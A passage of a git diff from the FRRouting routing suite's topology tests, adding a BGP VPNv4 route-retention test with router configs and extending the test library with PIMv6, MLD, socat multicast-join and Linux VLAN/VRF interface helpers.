+ rt vpn both 53:100
+ export vpn
+ import vpn
+ exit-address-family
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/r2/isisd.conf b/tests/topotests/bgp_vpnv4_noretain/r2/isisd.conf
new file mode 100644
index 0000000000..cbec8c3674
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r2/isisd.conf
@@ -0,0 +1,14 @@
+interface r2-eth0
+ ip router isis 1
+ isis circuit-type level-1
+!
+interface lo
+ ip router isis 1
+ isis passive
+!
+router isis 1
+ is-type level-1
+ net 49.0002.0000.1995.00
+ segment-routing on
+ segment-routing prefix 2.2.2.2/32 index 22
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/r2/zebra.conf b/tests/topotests/bgp_vpnv4_noretain/r2/zebra.conf
new file mode 100644
index 0000000000..7ec644ac2a
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/r2/zebra.conf
@@ -0,0 +1,16 @@
+log stdout
+interface lo
+ ip address 2.2.2.2/32
+!
+interface r2-gre0
+ ip address 192.168.0.2/24
+!
+interface r2-eth1 vrf vrf1
+ ip address 10.200.0.2/24
+!
+interface r2-eth2 vrf vrf2
+ ip address 10.210.0.2/24
+!
+interface r2-eth0
+ ip address 10.125.0.2/24
+!
diff --git a/tests/topotests/bgp_vpnv4_noretain/test_bgp_vpnv4_noretain.py b/tests/topotests/bgp_vpnv4_noretain/test_bgp_vpnv4_noretain.py
new file mode 100644
index 0000000000..b4a841d9cf
--- /dev/null
+++ b/tests/topotests/bgp_vpnv4_noretain/test_bgp_vpnv4_noretain.py
@@ -0,0 +1,201 @@
+#!/usr/bin/env python
+
+#
+# test_bgp_vpnv4_noretain.py
+# Part of NetDEF Topology Tests
+#
+# Copyright 2022 6WIND S.A.
+#
+# Permission to use, copy, modify, and/or distribute this software
+# for any purpose with or without fee is hereby granted, provided
+# that the above copyright notice and this permission notice appear
+# in all copies.
+#
+# THE SOFTWARE IS PROVIDED "AS IS" AND NETDEF DISCLAIMS ALL WARRANTIES
+# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
+# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL NETDEF BE LIABLE FOR
+# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY
+# DAMAGES WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS,
+# WHETHER IN AN ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS
+# ACTION, ARISING OUT OF OR IN CONNECTION WITH THE USE OR PERFORMANCE
+# OF THIS SOFTWARE.
+#
+
+"""
+ test_bgp_vpnv4_noretain.py: Do not keep the VPNvx entries when no
+ VRF matches incoming VPNVx entries
+"""
+
+import os
+import sys
+import json
+from functools import partial
+import pytest
+
+# Save the Current Working Directory to find configuration files.
+CWD = os.path.dirname(os.path.realpath(__file__))
+sys.path.append(os.path.join(CWD, "../"))
+
+# pylint: disable=C0413
+# Import topogen and topotest helpers
+from lib import topotest
+from lib.topogen import Topogen, TopoRouter, get_topogen
+from lib.topolog import logger
+
+# Required to instantiate the topology builder class.
+
+
+pytestmark = [pytest.mark.bgpd]
+
+def build_topo(tgen):
+ "Build function"
+
+ tgen.add_router("r1")
+ tgen.add_router("r2")
+
+ switch = tgen.add_switch("s1")
+ switch.add_link(tgen.gears["r1"])
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s2")
+ switch.add_link(tgen.gears["r1"])
+
+ switch = tgen.add_switch("s3")
+ switch.add_link(tgen.gears["r2"])
+
+ switch = tgen.add_switch("s4")
+ switch.add_link(tgen.gears["r2"])
+
+
+def _populate_iface():
+ tgen = get_topogen()
+ cmds_list = [
+ 'modprobe mpls_router',
+ 'echo 100000 > /proc/sys/net/mpls/platform_labels',
+ 'ip link add vrf1 type vrf table 10',
+ 'ip link set dev vrf1 up',
+ 'ip link set dev {0}-eth1 master vrf1',
+ 'echo 1 > /proc/sys/net/mpls/conf/vrf1/input',
+ ]
+ cmds_list_extra = [
+ 'ip link add vrf2 type vrf table 20',
+ 'ip link set dev vrf2 up',
+ 'ip link set dev {0}-eth2 master vrf2',
+ 'echo 1 > /proc/sys/net/mpls/conf/vrf2/input',
+ ]
+
+ for cmd in cmds_list:
+ input = cmd.format('r1', '1', '2')
+ logger.info('input: ' + cmd)
+ output = tgen.net['r1'].cmd(cmd.format('r1', '1', '2'))
+ logger.info('output: ' + output)
+
+ for cmd in cmds_list:
+ input = cmd.format('r2', '2', '1')
+ logger.info('input: ' + cmd)
+ output = tgen.net['r2'].cmd(cmd.format('r2', '2', '1'))
+ logger.info('output: ' + output)
+
+ for cmd in cmds_list_extra:
+ input = cmd.format('r2', '2', '1')
+ logger.info('input: ' + cmd)
+ output = tgen.net['r2'].cmd(cmd.format('r2', '2', '1'))
+ logger.info('output: ' + output)
+
+def setup_module(mod):
+ "Sets up the pytest environment"
+
+ tgen = Topogen(build_topo, mod.__name__)
+ tgen.start_topology()
+
+ router_list = tgen.routers()
+ _populate_iface()
+
+ for rname, router in router_list.items():
+ router.load_config(
+ TopoRouter.RD_ZEBRA, os.path.join(CWD, "{}/zebra.conf".format(rname))
+ )
+ router.load_config(
+ TopoRouter.RD_BGP, os.path.join(CWD, "{}/bgpd.conf".format(rname))
+ )
+ router.load_config(
+ TopoRouter.RD_ISIS, os.path.join(CWD, "{}/bgpd.conf".format(rname))
+ )
+
+ # Initialize all routers.
+ tgen.start_router()
+
+
+def teardown_module(_mod):
+ "Teardown the pytest environment"
+ tgen = get_topogen()
+
+ tgen.stop_topology()
+
+
+def test_protocols_convergence():
+ """
+ Assert that all protocols have converged
+ statuses as they depend on it.
+ """
+ tgen = get_topogen()
+ if tgen.routers_have_failure():
+ pytest.skip(tgen.errors)
+
+ # Check IPv4 VPN routing tables on r1
+ logger.info("Checking IPv4 routes for convergence on r1")
+ router = tgen.gears['r1']
+ json_file = "{}/{}/ipv4_vpn_routes.json".format(CWD, router.name)
+ if not os.path.isfile(json_file):
+ logger.info("skipping file {}".format(json_file))
+ assert 0, 'ipv4_vpn_routes.json file not found'
+ return
+
+ expected = json.loads(open(json_file).read())
+ test_func = partial(
+ topotest.router_json_cmp,
+ router,
+ "show bgp ipv4 vpn json",
+ expected,
+ )
+ _, result = topotest.run_and_expect(test_func, None, count=10, wait=0.5)
+ assertmsg = '"{}" JSON output mismatches'.format(router.name)
+ assert result is None, assertmsg
+
+ # Check BGP IPv4 routing tables after unsetting no retain flag
+ logger.info("Checking BGP IPv4 routes for convergence on r2")
+ router = tgen.gears['r1']
+ router.vtysh_cmd("configure\nrouter bgp 65500\naddress-family ipv4 vpn\nbgp retain route-target all\n")
+
+ # Check IPv4 VPN routing tables on r1
+ logger.info("Checking IPv4 routes for convergence on r1")
+ router = tgen.gears['r1']
+ json_file = "{}/{}/ipv4_vpn_routes_unfiltered.json".format(CWD, router.name)
+ if not os.path.isfile(json_file):
+ logger.info("skipping file {}".format(json_file))
+ assert 0, 'ipv4_vpn_routes_unfiltered.json file not found'
+ return
+
+ expected = json.loads(open(json_file).read())
+ test_func = partial(
+ topotest.router_json_cmp,
+ router,
+ "show bgp ipv4 vpn json",
+ expected,
+ )
+ _, result = topotest.run_and_expect(test_func, None, count=10, wait=0.5)
+ assertmsg = '"{}" JSON output mismatches'.format(router.name)
+ assert result is None, assertmsg
+
+def test_memory_leak():
+ "Run the memory leak test and report results."
+ tgen = get_topogen()
+ if not tgen.is_memleak_enabled():
+ pytest.skip("Memory leak test/report is disabled")
+
+ tgen.report_memory_leaks()
+
+
+if __name__ == "__main__":
+ args = ["-s"] + sys.argv[1:]
+ sys.exit(pytest.main(args))
diff --git a/tests/topotests/lib/common_config.py b/tests/topotests/lib/common_config.py
index 4afa86f740..fa33b02ed1 100644
--- a/tests/topotests/lib/common_config.py
+++ b/tests/topotests/lib/common_config.py
@@ -449,6 +449,8 @@ def check_router_status(tgen):
daemons.append("zebra")
if "pimd" in result:
daemons.append("pimd")
+ if "pim6d" in result:
+ daemons.append("pim6d")
if "ospfd" in result:
daemons.append("ospfd")
if "ospf6d" in result:
@@ -1035,6 +1037,12 @@ def start_topology(tgen, daemon=None):
TopoRouter.RD_PIM, "{}/{}/pimd.conf".format(tgen.logdir, rname)
)
+ if daemon and "pim6d" in daemon:
+ # Loading empty pimd.conf file to router, to start the pim6d deamon
+ router.load_config(
+ TopoRouter.RD_PIM6, "{}/{}/pim6d.conf".format(tgen.logdir, rname)
+ )
+
# Starting routers
logger.info("Starting all routers once topology is created")
tgen.start_router()
@@ -1131,6 +1139,8 @@ def topo_daemons(tgen, topo=None):
for val in topo["routers"][rtr]["links"].values():
if "pim" in val and "pimd" not in daemon_list:
daemon_list.append("pimd")
+ if "pim6" in val and "pim6d" not in daemon_list:
+ daemon_list.append("pim6d")
if "ospf" in val and "ospfd" not in daemon_list:
daemon_list.append("ospfd")
if "ospf6" in val and "ospf6d" not in daemon_list:
@@ -3234,6 +3244,86 @@ def configure_interface_mac(tgen, input_dict):
return True
+def socat_send_igmp_join_traffic(
+ tgen,
+ server,
+ protocol_option,
+ igmp_groups,
+ send_from_intf,
+ send_from_intf_ip=None,
+ port=12345,
+ reuseaddr=True,
+ join=False,
+ traffic=False,
+):
+ """
+ API to send IGMP join using SOCAT tool
+
+ Parameters:
+ -----------
+ * `tgen` : Topogen object
+ * `server`: iperf server, from where IGMP join would be sent
+ * `protocol_option`: Protocol options, ex: UDP6-RECV
+ * `igmp_groups`: IGMP group for which join has to be sent
+ * `send_from_intf`: Interface from which join would be sent
+ * `send_from_intf_ip`: Interface IP, default is None
+ * `port`: Port to be used, default is 12345
+ * `reuseaddr`: True|False, bydefault True
+ * `join`: If join needs to be sent
+ * `traffic`: If traffic needs to be sent
+
+ returns:
+ --------
+ errormsg or True
+ """
+
+ logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
+
+ rnode = tgen.routers()[server]
+ socat_cmd = "socat -u "
+
+ # UDP4/TCP4/UDP6/UDP6-RECV
+ if protocol_option:
+ socat_cmd += "{}".format(protocol_option)
+
+ if port:
+ socat_cmd += ":{},".format(port)
+
+ if reuseaddr:
+ socat_cmd += "{},".format("reuseaddr")
+
+ # Group address range to cover
+ if igmp_groups:
+ if not isinstance(igmp_groups, list):
+ igmp_groups = [igmp_groups]
+
+ for igmp_group in igmp_groups:
+ if join:
+ join_traffic_option = "ipv6-join-group"
+ elif traffic:
+ join_traffic_option = "ipv6-join-group-source"
+
+ if send_from_intf and not send_from_intf_ip:
+ socat_cmd += "{}='[{}]:{}'".format(
+ join_traffic_option, igmp_group, send_from_intf
+ )
+ else:
+ socat_cmd += "{}='[{}]:{}:[{}]'".format(
+ join_traffic_option, igmp_group, send_from_intf, send_from_intf_ip
+ )
+
+ socat_cmd += " STDOUT"
+
+ socat_cmd += " &>{}/socat.logs &".format(tgen.logdir)
+
+ # Run socat command to send IGMP join
+ logger.info("[DUT: {}]: Running command: [{}]".format(server, socat_cmd))
+ output = rnode.run("set +m; {} sleep 0.5".format(socat_cmd))
+
+ logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
+ return True
+
+
#############################################
# Verification APIs
#############################################
diff --git a/tests/topotests/lib/micronet.py b/tests/topotests/lib/micronet.py
index 02f66e9c26..dfa10ccb2f 100644
--- a/tests/topotests/lib/micronet.py
+++ b/tests/topotests/lib/micronet.py
@@ -599,6 +599,60 @@ class LinuxNamespace(Commander):
self.cmd_raises("mkdir -p " + inner)
self.cmd_raises("mount --rbind {} {} ".format(outer, inner))
+ def add_vlan(self, vlanname, linkiface, vlanid):
+ self.logger.debug("Adding VLAN interface: %s (%s)", vlanname, vlanid)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ self.cmd_raises(
+ [
+ ip_path,
+ "link",
+ "add",
+ "link",
+ linkiface,
+ "name",
+ vlanname,
+ "type",
+ "vlan",
+ "id",
+ vlanid,
+ ]
+ )
+ self.cmd_raises([ip_path, "link", "set", "dev", vlanname, "up"])
+
+ def add_loop(self, loopname):
+ self.logger.debug("Adding Linux iface: %s", loopname)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ self.cmd_raises([ip_path, "link", "add", loopname, "type", "dummy"])
+ self.cmd_raises([ip_path, "link", "set", "dev", loopname, "up"])
+
+ def add_l3vrf(self, vrfname, tableid):
+ self.logger.debug("Adding Linux VRF: %s", vrfname)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ self.cmd_raises(
+ [ip_path, "link", "add", vrfname, "type", "vrf", "table", tableid]
+ )
+ self.cmd_raises([ip_path, "link", "set", "dev", vrfname, "up"])
+
+ def del_iface(self, iface):
+ self.logger.debug("Removing Linux Iface: %s", iface)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ self.cmd_raises([ip_path, "link", "del", iface])
+
+ def attach_iface_to_l3vrf(self, ifacename, vrfname):
+ self.logger.debug("Attaching Iface %s to Linux VRF %s", ifacename, vrfname)
+ ip_path = self.get_exec_path("ip")
+ assert ip_path, "XXX missing ip command!"
+ if vrfname:
+ self.cmd_raises(
+ [ip_path, "link", "set", "dev", ifacename, "master", vrfname]
+ )
+ else:
+ self.cmd_raises([ip_path, "link", "set", "dev", ifacename, "nomaster"])
+
def add_netns(self, ns):
self.logger.debug("Adding network namespace %s", ns)
diff --git a/tests/topotests/lib/pim.py b/tests/topotests/lib/pim.py
index cd070e08b9..03ab02460f 100644
--- a/tests/topotests/lib/pim.py
+++ b/tests/topotests/lib/pim.py
@@ -36,6 +36,7 @@ from lib.common_config import (
InvalidCLIError,
retry,
run_frr_cmd,
+ validate_ip_address,
)
from lib.micronet import get_exec_path
from lib.topolog import logger
@@ -47,7 +48,7 @@ CWD = os.path.dirname(os.path.realpath(__file__))
def create_pim_config(tgen, topo, input_dict=None, build=False, load_config=True):
"""
- API to configure pim on router
+ API to configure pim/pimv6 on router
Parameters
----------
@@ -70,6 +71,16 @@ def create_pim_config(tgen, topo, input_dict=None, build=False, load_config=True
"prefix-list": "pf_list_1"
"delete": True
}]
+ },
+ "pim6": {
+ "disable" : ["l1-i1-eth1"],
+ "rp": [{
+ "rp_addr" : "2001:db8:f::5:17".
+ "keep-alive-timer": "100"
+ "group_addr_range": ["FF00::/8"]
+ "prefix-list": "pf_list_1"
+ "delete": True
+ }]
}
}
}
@@ -97,12 +108,8 @@ def create_pim_config(tgen, topo, input_dict=None, build=False, load_config=True
# Now add RP config to all routers
for router in input_dict.keys():
- if "pim" not in input_dict[router]:
- continue
- if "rp" not in input_dict[router]["pim"]:
- continue
- _add_pim_rp_config(tgen, topo, input_dict, router, build, config_data_dict)
-
+ if "pim" in input_dict[router] or "pim6" in input_dict[router]:
+ _add_pim_rp_config(tgen, topo, input_dict, router, build, config_data_dict)
try:
result = create_common_configurations(
tgen, config_data_dict, "pim", build, load_config
@@ -133,81 +140,123 @@ def _add_pim_rp_config(tgen, topo, input_dict, router, build, config_data_dict):
"""
logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
+ rp_data = []
+
+ # PIMv4
+ pim_data = None
+ if "pim" in input_dict[router]:
+ pim_data = input_dict[router]["pim"]
+ if "rp" in input_dict[router]["pim"]:
+ rp_data += pim_data["rp"]
- pim_data = input_dict[router]["pim"]
- rp_data = pim_data["rp"]
+ # PIMv6
+ pim6_data = None
+ if "pim6" in input_dict[router]:
+ pim6_data = input_dict[router]["pim6"]
+ if "rp" in input_dict[router]["pim6"]:
+ rp_data += pim6_data["rp"]
# Configure this RP on every router.
for dut in tgen.routers():
# At least one interface must be enabled for PIM on the router
pim_if_enabled = False
+ pim6_if_enabled = False
for destLink, data in topo[dut]["links"].items():
if "pim" in data:
pim_if_enabled = True
- if not pim_if_enabled:
+ if "pim6" in data:
+ pim6_if_enabled = True
+ if not pim_if_enabled and pim_data:
+ continue
+ if not pim6_if_enabled and pim6_data:
continue
config_data = []
- for rp_dict in deepcopy(rp_data):
- # ip address of RP
- if "rp_addr" not in rp_dict and build:
- logger.error(
- "Router %s: 'ip address of RP' not " "present in input_dict/JSON",
- router,
- )
-
- return False
- rp_addr = rp_dict.setdefault("rp_addr", None)
-
- # Keep alive Timer
- keep_alive_timer = rp_dict.setdefault("keep_alive_timer", None)
-
- # Group Address range to cover
- if "group_addr_range" not in rp_dict and build:
- logger.error(
- "Router %s:'Group Address range to cover'"
- " not present in input_dict/JSON",
- router,
- )
-
- return False
- group_addr_range = rp_dict.setdefault("group_addr_range", None)
+ if rp_data:
+ for rp_dict in deepcopy(rp_data):
+ # ip address of RP
+ if "rp_addr" not in rp_dict and build:
+ logger.error(
+ "Router %s: 'ip address of RP' not "
+ "present in input_dict/JSON",
+ router,
+ )
- # Group prefix-list filter
- prefix_list = rp_dict.setdefault("prefix_list", None)
+ return False
+ rp_addr = rp_dict.setdefault("rp_addr", None)
+ if rp_addr:
+ addr_type = validate_ip_address(rp_addr)
+ # Keep alive Timer
+ keep_alive_timer = rp_dict.setdefault("keep_alive_timer", None)
+
+ # Group Address range to cover
+ if "group_addr_range" not in rp_dict and build:
+ logger.error(
+ "Router %s:'Group Address range to cover'"
+ " not present in input_dict/JSON",
+ router,
+ )
- # Delete rp config
- del_action = rp_dict.setdefault("delete", False)
+ return False
+ group_addr_range = rp_dict.setdefault("group_addr_range", None)
- if keep_alive_timer:
- cmd = "ip pim rp keep-alive-timer {}".format(keep_alive_timer)
- if del_action:
- cmd = "no {}".format(cmd)
- config_data.append(cmd)
+ # Group prefix-list filter
+ prefix_list = rp_dict.setdefault("prefix_list", None)
- if rp_addr:
- if group_addr_range:
- if type(group_addr_range) is not list:
- group_addr_range = [group_addr_range]
+ # Delete rp config
+ del_action = rp_dict.setdefault("delete", False)
- for grp_addr in group_addr_range:
- cmd = "ip pim rp {} {}".format(rp_addr, grp_addr)
+ if keep_alive_timer:
+ if addr_type == "ipv4":
+ cmd = "ip pim rp keep-alive-timer {}".format(keep_alive_timer)
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+ if addr_type == "ipv6":
+ cmd = "ipv6 pim rp keep-alive-timer {}".format(keep_alive_timer)
if del_action:
cmd = "no {}".format(cmd)
config_data.append(cmd)
- if prefix_list:
- cmd = "ip pim rp {} prefix-list {}".format(rp_addr, prefix_list)
- if del_action:
- cmd = "no {}".format(cmd)
- config_data.append(cmd)
+ if rp_addr:
+ if group_addr_range:
+ if type(group_addr_range) is not list:
+ group_addr_range = [group_addr_range]
- if config_data:
- if dut not in config_data_dict:
- config_data_dict[dut] = config_data
- else:
- config_data_dict[dut].extend(config_data)
+ for grp_addr in group_addr_range:
+ if addr_type == "ipv4":
+ cmd = "ip pim rp {} {}".format(rp_addr, grp_addr)
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+ if addr_type == "ipv6":
+ cmd = "ipv6 pim rp {} {}".format(rp_addr, grp_addr)
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ if prefix_list:
+ if addr_type == "ipv4":
+ cmd = "ip pim rp {} prefix-list {}".format(
+ rp_addr, prefix_list
+ )
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+ if addr_type == "ipv6":
+ cmd = "ipv6 pim rp {} prefix-list {}".format(
+ rp_addr, prefix_list
+ )
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ if config_data:
+ if dut not in config_data_dict:
+ config_data_dict[dut] = config_data
+ else:
+ config_data_dict[dut].extend(config_data)
def create_igmp_config(tgen, topo, input_dict=None, build=False):
@@ -319,6 +368,121 @@ def create_igmp_config(tgen, topo, input_dict=None, build=False):
return result
+def create_mld_config(tgen, topo, input_dict=None, build=False):
+ """
+ API to configure mld for PIMv6 on router
+
+ Parameters
+ ----------
+ * `tgen` : Topogen object
+ * `topo` : json file data
+ * `input_dict` : Input dict data, required when configuring from
+ testcase
+ * `build` : Only for initial setup phase this is set as True.
+
+ Usage
+ -----
+ input_dict = {
+ "r1": {
+ "mld": {
+ "interfaces": {
+ "r1-r0-eth0" :{
+ "mld":{
+ "version": "2",
+ "delete": True
+ "query": {
+ "query-interval" : 100,
+ "query-max-response-time": 200
+ }
+ }
+ }
+ }
+ }
+ }
+ }
+
+ Returns
+ -------
+ True or False
+ """
+ logger.debug("Entering lib API: {}".format(sys._getframe().f_code.co_name))
+ result = False
+ if not input_dict:
+ input_dict = deepcopy(topo)
+ else:
+ topo = topo["routers"]
+ input_dict = deepcopy(input_dict)
+ for router in input_dict.keys():
+ if "mld" not in input_dict[router]:
+ logger.debug("Router %s: 'mld' is not present in " "input_dict", router)
+ continue
+
+ mld_data = input_dict[router]["mld"]
+
+ if "interfaces" in mld_data:
+ config_data = []
+ intf_data = mld_data["interfaces"]
+
+ for intf_name in intf_data.keys():
+ cmd = "interface {}".format(intf_name)
+ config_data.append(cmd)
+ protocol = "mld"
+ del_action = intf_data[intf_name]["mld"].setdefault("delete", False)
+ cmd = "ipv6 mld"
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ del_attr = intf_data[intf_name]["mld"].setdefault("delete_attr", False)
+ join = intf_data[intf_name]["mld"].setdefault("join", None)
+ source = intf_data[intf_name]["mld"].setdefault("source", None)
+ version = intf_data[intf_name]["mld"].setdefault("version", False)
+ query = intf_data[intf_name]["mld"].setdefault("query", {})
+
+ if version:
+ cmd = "ipv6 {} version {}".format(protocol, version)
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ if source and join:
+ for group in join:
+ cmd = "ipv6 {} join {} {}".format(protocol, group, source)
+
+ if del_attr:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ elif join:
+ for group in join:
+ cmd = "ipv6 {} join {}".format(protocol, group)
+
+ if del_attr:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
+ if query:
+ for _query, value in query.items():
+ if _query != "delete":
+ cmd = "ipv6 {} {} {}".format(protocol, _query, value)
+
+ if "delete" in intf_data[intf_name][protocol]["query"]:
+ cmd = "no {}".format(cmd)
+
+ config_data.append(cmd)
+ try:
+ result = create_common_configuration(
+ tgen, router, config_data, "interface_config", build=build
+ )
+ except InvalidCLIError:
+ errormsg = traceback.format_exc()
+ logger.error(errormsg)
+ return errormsg
+
+ logger.debug("Exiting lib API: {}".format(sys._getframe().f_code.co_name))
+ return result
+
+
def _enable_disable_pim_config(tgen, topo, input_dict, router, build=False):
"""
Helper API to enable or disable pim on interfaces
@@ -338,7 +502,7 @@ def _enable_disable_pim_config(tgen, topo, input_dict, router, build=False):
config_data = []
- # Enable pim on interfaces
+ # Enable pim/pim6 on interfaces
for destRouterLink, data in sorted(topo[router]["links"].items()):
if "pim" in data and data["pim"] == "enable":
# Loopback interfaces
@@ -351,6 +515,17 @@ def _enable_disable_pim_config(tgen, topo, input_dict, router, build=False):
config_data.append(cmd)
config_data.append("ip pim")
+ if "pim6" in data and data["pim6"] == "enable":
+ # Loopback interfaces
+ if "type" in data and data["type"] == "loopback":
+ interface_name = destRouterLink
+ else:
+ interface_name = data["interface"]
+
+ cmd = "interface {}".format(interface_name)
+ config_data.append(cmd)
+ config_data.append("ipv6 pim")
+
# pim global config
if "pim" in input_dict[router]:
pim_data = input_dict[router]["pim"]
@@ -366,6 +541,21 @@ def _enable_disable_pim_config(tgen, topo, input_dict, router, build=False):
cmd = "no {}".format(cmd)
config_data.append(cmd)
+ # pim6 global config
+ if "pim6" in input_dict[router]:
+ pim6_data = input_dict[router]["pim6"]
+ del_action = pim6_data.setdefault("delete", False)
+ for t in [
+ "join-prune-interval",
+ "keep-alive-timer",
+ "register-suppress-time",
+ ]:
+ if t in pim6_data:
+ cmd = "ipv6 pim {} {}".format(t, pim6_data[t])
+ if del_action:
+ cmd = "no {}".format(cmd)
+ config_data.append(cmd)
+
return config_data
@@ -732,9 +922,6 @@ def verify_upstream_iif(
"[DUT: %s]: Verifying upstream Inbound Interface" " for IGMP groups received:",
dut,
)
- show_ip_pim_upstream_json = run_frr_cmd(
- rnode, "show ip pim upstream json", isjson=True
- )
if type(group_addresses) is not list:
group_addresses = [group_addresses]
@@ -742,6 +929,17 @@ def verify_upstream_iif(
if type(iif) is not list:
iif = [iif]
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ ip_cmd = "ip"
+ elif addr_type == "ipv6":
+ ip_cmd = "ipv6"
+
+ cmd = "show {} pim upstream json".format(ip_cmd)
+ show_ip_pim_upstream_json = run_frr_cmd(rnode, cmd, isjson=True)
+
for grp_addr in group_addresses:
# Verify group address
if grp_addr not in show_ip_pim_upstream_json:
@@ -883,13 +1081,19 @@ def verify_join_state_and_timer(
"[DUT: %s]: Verifying Join state and Join Timer" " for IGMP groups received:",
dut,
)
- show_ip_pim_upstream_json = run_frr_cmd(
- rnode, "show ip pim upstream json", isjson=True
- )
if type(group_addresses) is not list:
group_addresses = [group_addresses]
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ cmd = "show ip pim upstream json"
+ elif addr_type == "ipv6":
+ cmd = "show ipv6 pim upstream json"
+ show_ip_pim_upstream_json = run_frr_cmd(rnode, cmd, isjson=True)
+
for grp_addr in group_addresses:
# Verify group address
if grp_addr not in show_ip_pim_upstream_json:
@@ -1010,12 +1214,31 @@ def verify_mroutes(
rnode = tgen.routers()[dut]
+ if not isinstance(group_addresses, list):
+ group_addresses = [group_addresses]
+
+ if not isinstance(iif, list) and iif != "none":
+ iif = [iif]
+
+ if not isinstance(oil, list) and oil != "none":
+ oil = [oil]
+
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ ip_cmd = "ip"
+ elif addr_type == "ipv6":
+ ip_cmd = "ipv6"
+
if return_uptime:
logger.info("Sleeping for %s sec..", mwait)
sleep(mwait)
logger.info("[DUT: %s]: Verifying ip mroutes", dut)
- show_ip_mroute_json = run_frr_cmd(rnode, "show ip mroute json", isjson=True)
+ show_ip_mroute_json = run_frr_cmd(
+ rnode, "show {} mroute json".format(ip_cmd), isjson=True
+ )
if return_uptime:
uptime_dict = {}
@@ -1024,15 +1247,6 @@ def verify_mroutes(
error_msg = "[DUT %s]: mroutes are not present or flushed out !!" % (dut)
return error_msg
- if not isinstance(group_addresses, list):
- group_addresses = [group_addresses]
-
- if not isinstance(iif, list) and iif != "none":
- iif = [iif]
-
- if not isinstance(oil, list) and oil != "none":
- oil = [oil]
-
for grp_addr in group_addresses:
if grp_addr not in show_ip_mroute_json:
errormsg = "[DUT %s]: Verifying (%s, %s) mroute," "[FAILED]!! " % (
@@ -1214,15 +1428,20 @@ def verify_pim_rp_info(
rnode = tgen.routers()[dut]
- logger.info("[DUT: %s]: Verifying ip rp info", dut)
- show_ip_rp_info_json = run_frr_cmd(rnode, "show ip pim rp-info json", isjson=True)
-
if type(group_addresses) is not list:
group_addresses = [group_addresses]
if type(oif) is not list:
oif = [oif]
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ ip_cmd = "ip"
+ elif addr_type == "ipv6":
+ ip_cmd = "ipv6"
+
for grp_addr in group_addresses:
if rp is None:
rp_details = find_rp_details(tgen, topo)
@@ -1232,9 +1451,14 @@ def verify_pim_rp_info(
else:
iamRP = False
else:
- show_ip_route_json = run_frr_cmd(
- rnode, "show ip route connected json", isjson=True
- )
+ if addr_type == "ipv4":
+ show_ip_route_json = run_frr_cmd(
+ rnode, "show ip route connected json", isjson=True
+ )
+ elif addr_type == "ipv6":
+ show_ip_route_json = run_frr_cmd(
+ rnode, "show ipv6 route connected json", isjson=True
+ )
for _rp in show_ip_route_json.keys():
if rp == _rp.split("/")[0]:
iamRP = True
@@ -1242,16 +1466,27 @@ def verify_pim_rp_info(
else:
iamRP = False
+ logger.info("[DUT: %s]: Verifying ip rp info", dut)
+ cmd = "show {} pim rp-info json".format(ip_cmd)
+ show_ip_rp_info_json = run_frr_cmd(rnode, cmd, isjson=True)
+
if rp not in show_ip_rp_info_json:
- errormsg = "[DUT %s]: Verifying rp-info" "for rp_address %s [FAILED]!! " % (
- dut,
- rp,
+ errormsg = (
+ "[DUT %s]: Verifying rp-info "
+ "for rp_address %s [FAILED]!! " % (dut, rp)
)
return errormsg
else:
group_addr_json = show_ip_rp_info_json[rp]
for rp_json in group_addr_json:
+ if "rpAddress" not in rp_json:
+ errormsg = "[DUT %s]: %s key not " "present in rp-info " % (
+ dut,
+ "rpAddress",
+ )
+ return errormsg
+
if oif is not None:
found = False
if rp_json["outboundInterface"] not in oif:
@@ -1380,14 +1615,26 @@ def verify_pim_state(
rnode = tgen.routers()[dut]
logger.info("[DUT: %s]: Verifying pim state", dut)
- show_pim_state_json = run_frr_cmd(rnode, "show ip pim state json", isjson=True)
-
- if installed_fl is None:
- installed_fl = 1
if type(group_addresses) is not list:
group_addresses = [group_addresses]
+ for grp in group_addresses:
+ addr_type = validate_ip_address(grp)
+
+ if addr_type == "ipv4":
+ ip_cmd = "ip"
+ elif addr_type == "ipv6":
+ ip_cmd = "ipv6"
+
+ logger.info("[DUT: %s]: Verifying pim state", dut)
+ show_pim_state_json = run_frr_cmd(
+ rnode, "show {} pim state json".format(ip_cmd), isjson=True
+ )
+
+ if installed_fl is None:
+ installed_fl = 1
+
for grp_addr in group_addresses:
if src_address is None:
src_address = "*"
@@ -3635,7 +3882,7 @@ def verify_local_igmp_groups(tgen, dut, interface, group_addresses):
return True
-def verify_pim_interface_traffic(tgen, input_dict, return_stats=True):
